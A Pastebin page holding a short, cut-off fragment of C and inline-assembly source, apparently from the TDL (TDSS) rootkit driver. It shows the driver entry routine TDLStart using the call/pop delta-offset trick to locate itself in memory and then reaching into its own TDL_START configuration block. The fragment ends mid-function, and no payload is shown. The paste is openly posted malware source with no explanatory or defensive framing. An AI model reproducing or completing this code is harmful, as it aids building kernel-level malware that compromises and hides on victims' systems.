Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- NTSTATUS TDLStart(PDRIVER_OBJECT pdoDriver,PUNICODE_STRING pusRegistry)
- {
- PTDL_START ptsStart;
- DWORD dwDelta;
- PIMAGE_NT_HEADERS pinhHeader;
- PIMAGE_SECTION_HEADER pishHeader;
- DWORD dwSection;
- __asm
- {
- call delta
- delta:
- pop eax
- sub eax,offset delta
- mov [dwDelta],eax
- }
- ptsStart=(PTDL_START)RtlOffsetToPointer(TDLStart,dwDelta+TDL_START_SIZE-sizeof(TDL_START));
- if((DWORD_PTR)pusRegistry>1)
- {
Add Comment
Please, Sign In to add comment
